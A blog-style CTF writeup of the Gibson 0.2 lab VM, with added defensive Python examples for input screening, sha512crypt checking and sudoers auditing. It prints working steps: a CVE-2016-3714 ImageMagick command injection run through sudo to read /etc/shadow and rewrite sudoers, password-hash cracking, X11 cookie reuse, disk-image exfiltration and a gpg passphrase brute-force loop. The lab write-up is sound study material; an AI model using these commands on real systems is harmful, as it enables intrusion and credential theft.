Gibson 0.2

I decided to get started in the world of CTF writeups with this VM made by Knightmare! The description promised some unexpected twists, but at the same time it didn’t seem to be heavy on reversing and/or binary exploitation, so I felt it was a good place to start. Without further ado, let’s begin!

Service discovery

The starting point is always finding out which services are running on the open ports, so let’s do that.

root@kali:~# nmap -A -p1-65535 192.168.56.102

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-17 18:14 CEST
Nmap scan report for 192.168.56.102
Host is up (0.00022s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 fb:f6:d1:57:64:fa:38:66:2d:66:40:12:a4:2f:75:b4 (DSA)
|   2048 32:13:58:ae:32:b0:5d:b9:2a:9c:87:9c:ae:79:3b:2e (RSA)
|_  256 3f:dc:7d:94:2f:86:f1:83:41:db:8c:74:52:f0:49:43 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 273   2016-05-07 13:03  davinci.html
|_
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:AF:47:CA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: Host: gibson.example.co.uk; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.83 seconds

Of course I wasn’t going to be able to SSH straight in, so I’d better check what was on the web server.

Web server

I opened Iceweasel and navigated to port 80. There was a single file listed: davinci.html.

<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>

This seemed a pretty clear hint about the SSH credentials. I tried SSHing in as Margo, davinci, root and eugene, but none of them was asked for a password (only publickey authentication was offered). I tried being explicit, just in case:

ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no 192.168.56.102

But no luck, the password login was disabled.

…Then I noticed I had tried Margo, not margo, and guess what?

ssh margo@192.168.56.102 #god

Bingo.

Margo

Of course sudo su didn’t work (it would have been too easy, right?) but I was luckier with sudo -l. It seemed that margo could run /usr/bin/convert as root. The binary is part of the ImageMagick suite… which reminded me of CVE-2016-3714.

After some research, I managed to run commands as root exploiting said vulnerability. The fastest way to get root with this was to edit the sudoers file, but before that I played around a little.

margo@gibson:~$ sudo convert 'https://example.com"|cat "/etc/shadow' out.png
root:!:16921:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16921:0:99999:7:::
dnsmasq:*:16921:0:99999:7:::
landscape:*:16921:0:99999:7:::
sshd:*:16921:0:99999:7:::
libvirt-qemu:!:16921:0:99999:7:::
libvirt-dnsmasq:!:16921:0:99999:7:::
duke:$6$xRLSRx7x$O.REaRUKj6zM.ZAYFBfZEfq.iyoiHKlpNCFlh9D8gQBfRdldL05vAxHmjuTgriKCetSADyWyLKvklZhcQp7mu1:16928:0:99999:7:::
colord:*:16922:0:99999:7:::
eugene:$6$UU15rhob$qZ5B2VjeCk9QIlxXS6QDf9MuxFpNkfAQTc3V3ny.57kLHLj1aOdLnmprfL53niAfztzGMLJqSZaS79sYY1X1a/:16928:0:99999:7:::
margo:$6$Nx0eYFUO$f99BzOSc/hBLbflCsV5912gdcNNUKRi/xGTz7xldbr402BQ367eN.GsCScejNNotaJg9oQPhqdzqq/DcHCKYD/:16928:0:99999:7:::
convert.im6: unable to open image `/tmp/magick-rCN9wlXv': No such file or directory @ error/blob.c/OpenBlob/2638.
convert.im6: unable to open file `/tmp/magick-rCN9wlXv': No such file or directory @ error/constitute.c/ReadImage/583.
convert.im6: no images defined `out.png' @ error/convert.c/ConvertImageCommand/3044.
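The delegate injection above works because the argument string, not the image bytes, selects an ImageMagick coder and its shell-backed delegate. The advisory the writeup later cites recommends two mitigations: check the magic bytes of every input file and disable the risky coders in policy.xml. As an added example (not code from the writeup or from ImageMagick), here is the magic-byte check plus a screen on the argument string itself; the function names, the accepted-format table and the constructed sample files are my own assumptions.

```python
"""Input validation for files handed to ImageMagick's convert.

Added example; not code from the writeup or from ImageMagick. CVE-2016-3714
needs a filename (or file content) that selects a delegate-backed coder such
as https:, mvg:, msl:, ephemeral: or label:, plus shell metacharacters that
survive into the delegate command line. This screens both, and sniffs magic
bytes instead of trusting the extension. Names and samples are assumptions.
"""
import os
import re
import tempfile
from typing import Optional, Tuple

# Leading bytes of the raster formats this deployment is willing to accept.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# A `coder:` prefix in the argument selects an ImageMagick coder; these are the
# delegate-backed ones the CVE-2016-3714 advisory tells you to disable.
DANGEROUS_PREFIX = re.compile(r"^(https?|ftp|mvg|msl|ephemeral|label|text):", re.I)

# Characters a delegate command line would hand to /bin/sh.
SHELL_META = set('|"`$;&<>\'\\\n')


def classify_name(arg: str) -> Optional[str]:
    """Return why the argument string itself is unacceptable, or None if fine."""
    if DANGEROUS_PREFIX.match(arg):
        return "coder prefix in argument"
    bad = sorted(SHELL_META.intersection(arg))
    if bad:
        return "shell metacharacters in argument: " + repr("".join(bad))
    return None


def sniff_format(path: str) -> Optional[str]:
    """Return the format implied by the file's first bytes, else None."""
    with open(path, "rb") as fh:
        head = fh.read(16)
    for magic, fmt in MAGIC.items():
        if head.startswith(magic):
            return fmt
    return None


def is_safe_input(arg: str) -> Tuple[bool, str]:
    """Decide whether `arg` may be passed to convert as an input file."""
    reason = classify_name(arg)
    if reason:
        return False, reason
    if not os.path.isfile(arg):
        return False, "not a regular file"
    fmt = sniff_format(arg)
    if fmt is None:
        return False, "unrecognised magic bytes"
    return True, fmt


def demo() -> dict:
    """Classify the writeup's argument string and two constructed files."""
    d = tempfile.mkdtemp()
    # Constructed: innocent name, MVG text inside. An extension check passes
    # it; the magic-byte check rejects it.
    mvg_as_jpg = os.path.join(d, "photo.jpg")
    with open(mvg_as_jpg, "wb") as fh:
        fh.write(b"push graphic-context\nviewbox 0 0 640 480\n")
    # Constructed: a stub that starts with a real JPEG SOI/APP0 marker.
    real_jpg = os.path.join(d, "real.jpg")
    with open(real_jpg, "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 8)
    return {
        "writeup_argument": is_safe_input('https://example.com"|cat "/etc/shadow'),
        "mvg_as_jpg": is_safe_input(mvg_as_jpg),
        "real_jpg": is_safe_input(real_jpg),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:18} -> {verdict}")
```

The argument screen alone is not enough: a file called photo.jpg whose content is MVG text still reaches the MVG coder, which is why the magic-byte check is the one the advisory leads with, and why the policy.xml coder disables belong on the box as well.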

I cracked the hashes for duke and eugene with John the Ripper, which was surprisingly fast.

root@kali:~/gibson# john hashes.txt 
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 75.42% 1/3 (ETA: 18:47:31) 0g/s 811.3p/s 811.3c/s 811.3C/s 9999955..d9999957
secret           (eugene)
love             (duke)
god              (margo)
3g 0:00:00:16 DONE 2/3 (2016-05-17 18:47) 0.1806g/s 729.3p/s 740.8c/s 740.8C/s fiction..jethrotull
Use the "--show" option to display all of the cracked passwords reliably
Session completed
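To make clear what John was doing in those sixteen seconds, here is an added example (not the writeup's code, not John's) that reimplements the crypt(3) SHA-512 scheme behind the $6$ hashes above using only hashlib, then checks a short constructed wordlist against the three hashes copied from the shadow dump. The salt is public, the default work factor is only 5000 rounds, and nothing else protects a three-letter password. Function names and the wordlist are my own assumptions.

```python
"""Pure-Python sha512crypt ($6$) verifier.

Added example; not code from the writeup. Implements Drepper's crypt(3)
SHA-512 scheme as used for the $6$ entries in the shadow dump above, so the
cost John pays per candidate is visible: one salted, 5000-round SHA-512.
The three hashes are copied from the writeup; everything else is mine.
"""
import hashlib
import re
from typing import Dict, Iterable

B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Output byte order used by crypt(3) for SHA-512: 21 triples, then byte 63.
PERM = [
    (0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
    (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
    (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
    (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
    (62, 20, 41),
]

HASH_RE = re.compile(r"^\$6\$(?:rounds=(\d+)\$)?([^$]{1,16})\$([./0-9A-Za-z]{86})$")


def _b64_24(b2: int, b1: int, b0: int, n: int) -> str:
    """crypt(3)'s little-endian base64 of a 24-bit word, n characters."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(B64[w & 0x3F])
        w >>= 6
    return "".join(out)


def _digest(password: str, salt: str, rounds: int) -> str:
    pw, s, sha = password.encode(), salt.encode(), hashlib.sha512
    b = sha(pw + s + pw).digest()                       # digest B
    a = sha(pw + s)                                     # digest A ...
    a.update((b * (len(pw) // 64 + 1))[:len(pw)])       # ... plus len(pw) bytes of B
    n = len(pw)
    while n:                                            # bits of len(pw), low first
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    dp = sha(pw * len(pw)).digest()                     # P: password-derived bytes
    p = (dp * (len(pw) // 64 + 1))[:len(pw)]
    ds = sha(s * (16 + a[0])).digest()                  # S: salt-derived bytes
    sb = (ds * (len(s) // 64 + 1))[:len(s)]
    c = a
    for i in range(rounds):                             # the stretching loop
        h = sha()
        h.update(p if i & 1 else c)
        if i % 3:
            h.update(sb)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    return "".join(_b64_24(c[x], c[y], c[z], 4) for x, y, z in PERM) + _b64_24(0, 0, c[63], 2)


def sha512crypt(password: str, salt: str, rounds: int = 5000) -> str:
    """Full shadow-style string for password/salt (salt truncated to 16)."""
    salt = salt[:16]
    tag = "$6$" if rounds == 5000 else f"$6$rounds={rounds}$"
    return f"{tag}{salt}${_digest(password, salt, rounds)}"


def verify(password: str, shadow_hash: str) -> bool:
    """True if password produces shadow_hash under its own salt and rounds."""
    m = HASH_RE.match(shadow_hash)
    if not m:
        raise ValueError("not a $6$ hash")
    rounds = int(m.group(1)) if m.group(1) else 5000
    return _digest(password, m.group(2), rounds) == m.group(3)


def check_wordlist(shadow: Dict[str, str], words: Iterable[str]) -> Dict[str, str]:
    """Return {user: password} for each hash matched by a word (what John does)."""
    words = list(words)
    found = {}
    for user, h in shadow.items():
        for w in words:
            if verify(w, h):
                found[user] = w
                break
    return found


# Copied from the /etc/shadow dump in the writeup.
SHADOW = {
    "duke": "$6$xRLSRx7x$O.REaRUKj6zM.ZAYFBfZEfq.iyoiHKlpNCFlh9D8gQBfRdldL05vAxHmjuTgriKCetSADyWyLKvklZhcQp7mu1",
    "eugene": "$6$UU15rhob$qZ5B2VjeCk9QIlxXS6QDf9MuxFpNkfAQTc3V3ny.57kLHLj1aOdLnmprfL53niAfztzGMLJqSZaS79sYY1X1a/",
    "margo": "$6$Nx0eYFUO$f99BzOSc/hBLbflCsV5912gdcNNUKRi/xGTz7xldbr402BQ367eN.GsCScejNNotaJg9oQPhqdzqq/DcHCKYD/",
}

# Constructed wordlist: the four "most common" passwords the HTML comment jokes about.
WORDS = ["password", "love", "secret", "god"]

if __name__ == "__main__":
    for user, pw in check_wordlist(SHADOW, WORDS).items():
        print(f"{user}: {pw}")
```

The same loop with a real dictionary is all a cracker needs; on the defensive side, the lever that actually changes the picture is the cost per guess, which is why a higher rounds= value (or yescrypt on newer distributions) and passwords that are not in any dictionary matter far more than the hash's secrecy.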

Eugene

duke seemed a pretty normal user, but eugene was good news. From the sudoers file I found out that eugene could execute another command as root:

eugene ALL=(ALL) NOPASSWD: /usr/bin/virt-manager 

I honestly had no idea what that was. After some googling, I learned that virt-manager is a VM manager! Then I remembered the hints given in the description of the challenge:

  • It doesn’t matter what your local subnet is, as long as you keep away from the 192.168.122.0/24 subnet.
  • SSH can forward X11.
  • The challenge isn’t over with root. The flag is not where you expect to find it.

The network part was interesting.

eugene@gibson::~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:af:47:ca  
          inet addr:192.168.56.102  Bcast:192.168.56.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:feaf:47ca/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:143078 errors:0 dropped:0 overruns:0 frame:0
          TX packets:140857 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:9389412 (9.3 MB)  TX bytes:11069499 (11.0 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:752 errors:0 dropped:0 overruns:0 frame:0
          TX packets:752 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:54416 (54.4 KB)  TX bytes:54416 (54.4 KB)

virbr0    Link encap:Ethernet  HWaddr fe:54:00:72:e2:fb  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1271 (1.2 KB)  TX bytes:1889 (1.8 KB)

vnet0     Link encap:Ethernet  HWaddr fe:54:00:72:e2:fb  
          inet6 addr: fe80::fc54:ff:fe72:e2fb/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1665 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:1355 (1.3 KB)  TX bytes:87921 (87.9 KB)

Wow, so there was actually another active interface: virbr0. Could it be that, inside the VM, there was ANOTHER VM?

The thing was that I couldn’t SSH in as eugene directly, because of the no-password restriction. I could’ve added a public key to his home directory or disabled the restriction, but instead I just su'd into him.

…Which was a pain, because when running sudo virt-manager it complained about the X11 authentication failing. Of course, I didn’t have an xauth cookie for eugene. So I copied it from margo.

root@kali:~/gibson# ssh -X margo@192.168.56.102
Ubuntu 14.04.3 LTS
margo@192.168.56.102's password: #god
margo@gibson:~$ xauth list
gibson/unix:10  MIT-MAGIC-COOKIE-1  01dccb5a0820e7f65c5211528c49c0eb
margo@gibson:~$ su eugene
Password: #secret
eugene@gibson:/home/margo$ xauth add gibson/unix:10  MIT-MAGIC-COOKIE-1  01dccb5a0820e7f65c5211528c49c0eb
eugene@gibson:/home/margo$ sudo /usr/bin/virt-manager

Holy f*ck, I got in.

Note

Of course, I could’ve always modified the /etc/sudoers file to get root directly:

sudo convert 'https://example.com"|vi "/etc/sudoers' out.png

Change the following line:

margo ALL=(ALL) NOPASSWD: ALL#/usr/bin/convert

And voilà.

margo@gibson:~$ sudo su
root@gibson:/home/margo# 
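Both sudoers lines on this page (the virt-manager grant for eugene and the edited `ALL#/usr/bin/convert` line for margo) are things an auditor should catch before an attacker does. As an added example (not code from the writeup or from sudo), here is a small parser that reads user specifications of that shape, applies the sudoers comment rule (`#` opens a comment unless a digit follows, which is the `#uid` form, so the trailing `#/usr/bin/convert` is dead text and the grant is `ALL`), and flags NOPASSWD, `ALL` commands and binaries that give arbitrary file access as root. Tags are taken once at the start of the command list, and the "risky binaries" set is my own assumption, with /usr/bin/convert on it because of the delegate injection the writeup uses.

```python
"""Audit user specifications in a sudoers file.

Added example; not code from the writeup or from sudo. Parses lines of the
shape `user host=(runas) TAG: cmd, cmd` and reports what a reviewer would
question. Simplifications and the RISKY_CMDS set are my own assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.*)$"
)
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:\s*", re.I)

# Assumption: binaries that, run as root, hand the caller arbitrary file access.
RISKY_CMDS = {"/usr/bin/convert", "/usr/bin/vi", "/usr/bin/vim", "/bin/sh", "/bin/bash"}


@dataclass
class Spec:
    user: str
    host: str
    runas: str
    tags: List[str]
    commands: List[str]
    findings: List[str] = field(default_factory=list)


def strip_comment(line: str) -> str:
    """Drop a trailing comment; `#123` means a uid/gid and is kept."""
    return re.sub(r"#(?!\d).*$", "", line).strip()


def parse_spec(line: str) -> Optional[Spec]:
    """Parse one user-specification line; None for blanks, comments, Defaults."""
    line = strip_comment(line)
    if not line or line.startswith("Defaults"):
        return None
    m = SPEC_RE.match(line)
    if not m:
        return None
    rest = m.group("rest")
    tags: List[str] = []
    while True:                       # leading tags apply to the whole list here
        t = TAG_RE.match(rest)
        if not t:
            break
        tags.append(t.group(1).upper())
        rest = rest[t.end():]
    commands = [c.strip() for c in rest.split(",") if c.strip()]
    spec = Spec(m.group("user"), m.group("host"),
                m.group("runas") or m.group("user"), tags, commands)
    if "NOPASSWD" in tags:
        spec.findings.append("no password required")
    for cmd in commands:
        if cmd == "ALL":
            spec.findings.append("unrestricted command (ALL)")
        elif cmd.split()[0] in RISKY_CMDS:
            spec.findings.append(f"arbitrary file access as {spec.runas}: {cmd}")
    return spec


def audit(text: str) -> List[Spec]:
    """Return only the specs that have findings, in file order."""
    out = []
    for raw in text.splitlines():
        spec = parse_spec(raw)
        if spec and spec.findings:
            out.append(spec)
    return out


# Constructed sample; the eugene and margo lines are the ones shown in the writeup.
SAMPLE = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
eugene ALL=(ALL) NOPASSWD: /usr/bin/virt-manager
margo ALL=(ALL) NOPASSWD: ALL#/usr/bin/convert
"""

if __name__ == "__main__":
    for s in audit(SAMPLE):
        print(f"{s.user}: {', '.join(s.findings)}")
```

Run against the sample, margo's line reports both "no password required" and "unrestricted command (ALL)", which is exactly the state the edit above leaves the box in; a pre-edit line granting only /usr/bin/convert would instead trip the risky-binary finding.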

FreeDOS?

The virt-manager GUI appeared, and only one machine, named “ftpserv”, existed. I opened a console by double-clicking it and discovered that it was running FreeDOS :-O I had to Google quite a bit at this point…

Once I thought I could continue, I started by exploring the directories. After a dir I found a directory named GARBAGE which caught my attention.

cd garbage
dir

ADMINSPO.JPG
FLAG.IMG
JZ_UG.ANS

FLAG.IMG seemed interesting, but I had to find a way to get it out of the box.

I decided to go big and copied the full VM disk image to my Kali box. I’m subtle as that :)

At this point root permissions became a necessity, so I modified the sudoers file as explained above.

margo@gibson:~$ sudo su
root@gibson:/home/margo# cp /var/lib/libvirt/images/ftpserv.img /tmp/
root@gibson:/home/margo# chown margo /tmp/ftpserv.img

And then I was able to get it from my Kali:

root@kali:~# scp margo@192.168.56.102:/tmp/ftpserv.img gibson

Getting the flag

I mounted the image (fun name, KFLYNN, Kevin Flynn from Tron!) and went to garbage.

There I ran exiftool to peek at the metadata of the JPG file:

root@kali:/media/root/KFYLNN/GARBAGE# exiftool adminspo.jpg
ExifTool Version Number         : 10.15
File Name                       : adminspo.jpg
Directory                       : .
File Size                       : 120 kB
File Modification Date/Time     : 2016:05:04 23:17:44+02:00
File Access Date/Time           : 1980:01:01 01:00:00+01:00
File Inode Change Date/Time     : 2016:05:04 23:31:08+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them off at the pass
Modify Date                     : 2016:05:04 22:29:32
Artist                          : Virtualization is fun.. What's more, esoteric OSes on 192.168.122 are even more fun
User Comment                    : So there's info here.... Images, hmm... Wasn't that a CVE...? Oh yes... CVE 2016-3714....http://www.openwall.com/lists/oss-security/2016/05/03/18 so which person can run it. Perhaps the man who knew a lot about Sean Connery in Trainspotting when he wasn't  causing a 7 point drop in the NYSE
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 800
Image Height                    : 800
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 800x800
Megapixels                      : 0.640

Fun, but not useful anymore :)

So it was time to mount flag.img.

There were three files: an executable program, its source code in C, and a hint.txt file.

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cat hint.txt
http://www.imdb.com/title/tt0117951/ and
http://www.imdb.com/title/tt0113243/ have
someone in common... Can you remember his
original nom de plume in 1988...?

So it turns out Trainspotting and Hackers have the actor Jonny Lee Miller in common. I had to search what “nom de plume” meant (lol), but I quickly learnt it translates to “nickname”. I guess I should’ve known that already but… Whatever, Miller’s nickname in Hackers (which takes place in 1988) is “Zero Cool/Crash Override”. But what do I do with that?

I have to say I spent far too much time trying to break the game in order to get something interesting out of it. I modified the highscores.txt file trying to make it crash, entered ZeroCool and CrashOverride as users just in case, played around with the snake (fun game btw), but eventually…

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 70
drwxr-xr-x  4 root root  1024 May 14 15:07 .
drwxr-x---+ 4 root root  4096 May 21 09:40 ..
-rwxrwxr-x  1 root root 21358 Nov 16  2011 davinci
-rw-r--r--  1 root root 28030 Nov 16  2011 davinci.c
-rw-r--r--  1 root root   159 May  5 20:56 hint.txt
drwx------  2 root root 12288 May  5 20:39 lost+found
drwxr-xr-x  2 root root  1024 May  5 21:07 .trash

Yeah, maybe I should have started by doing that.

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cd .trash/
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121/.trash# ls -la
total 319
drwxr-xr-x 2 root root   1024 May  5 21:07 .
drwxr-xr-x 4 root root   1024 May 14 15:07 ..
---x------ 1 root root    469 May 14 15:18 flag.txt.gpg
-rw-r--r-- 1 root root 320130 Sep  7  2015 LeithCentralStation.jpg

So now I needed the passphrase to decrypt the flag! Could it be that hint.txt was referring to this?

I tried gpg with ZeroCool, zerocool, CrashOverride and crashoverride as passphrases, to no avail. I ran exiftool on the jpg file too, but there was nothing interesting.

So I decided to go full brute force and generated some wordlists with cupp’s interactive mode.

root@kali:~/gibson# ~/cupp.py -i
...
root@kali:~/gibson# for i in $(cat ~/cupp/zero.txt); do gpg --passphrase $i flag.txt.gpg; if [ -a "flag.txt" ]; then echo "Passphrase found! $i"; break; fi; done

After some tries and combinations, what finally did the trick was including the word ‘ZeroKool’ AND activating the tool’s l33t mode.

...
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
gpg: WARNING: message was not integrity protected
Passphrase found! Z3r0K00l
root@kali:~/gibson# cat flag.txt
 _   _            _      _____ _             ____  _                  _   _
| | | | __ _  ___| | __ |_   _| |__   ___   |  _ \| | __ _ _ __   ___| |_| |
| |_| |/ _` |/ __| |/ /   | | | '_ \ / _ \  | |_) | |/ _` | '_ \ / _ \ __| |
|  _  | (_| | (__|   <    | | | | | |  __/  |  __/| | (_| | | | |  __/ |_|_|
|_| |_|\__,_|\___|_|\_\   |_| |_| |_|\___|  |_|   |_|\__,_|_| |_|\___|\__(_)


Should you not be standing in a 360 degree rotating payphone when reading
this flag...? B-)

Anyhow, congratulations once more on rooting this VM. This time things were
a bit esoteric, but I hope you enjoyed it all the same.

Shout-outs again to #vulnhub for hosting a great learning tool. A special
thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer
to host the CTF once more.
                                                              --Knightmare

Phew! For my first CTF writeup, this one surely got me confused for a while and made me take my time! I’m sure this could have been done better/faster, but nonetheless I managed to complete it. Big thanks to Knightmare for the fun challenge, I really enjoyed the movie references and learned quite a few new things (special mention to the whole FreeDOS thing!)

Written on May 21, 2016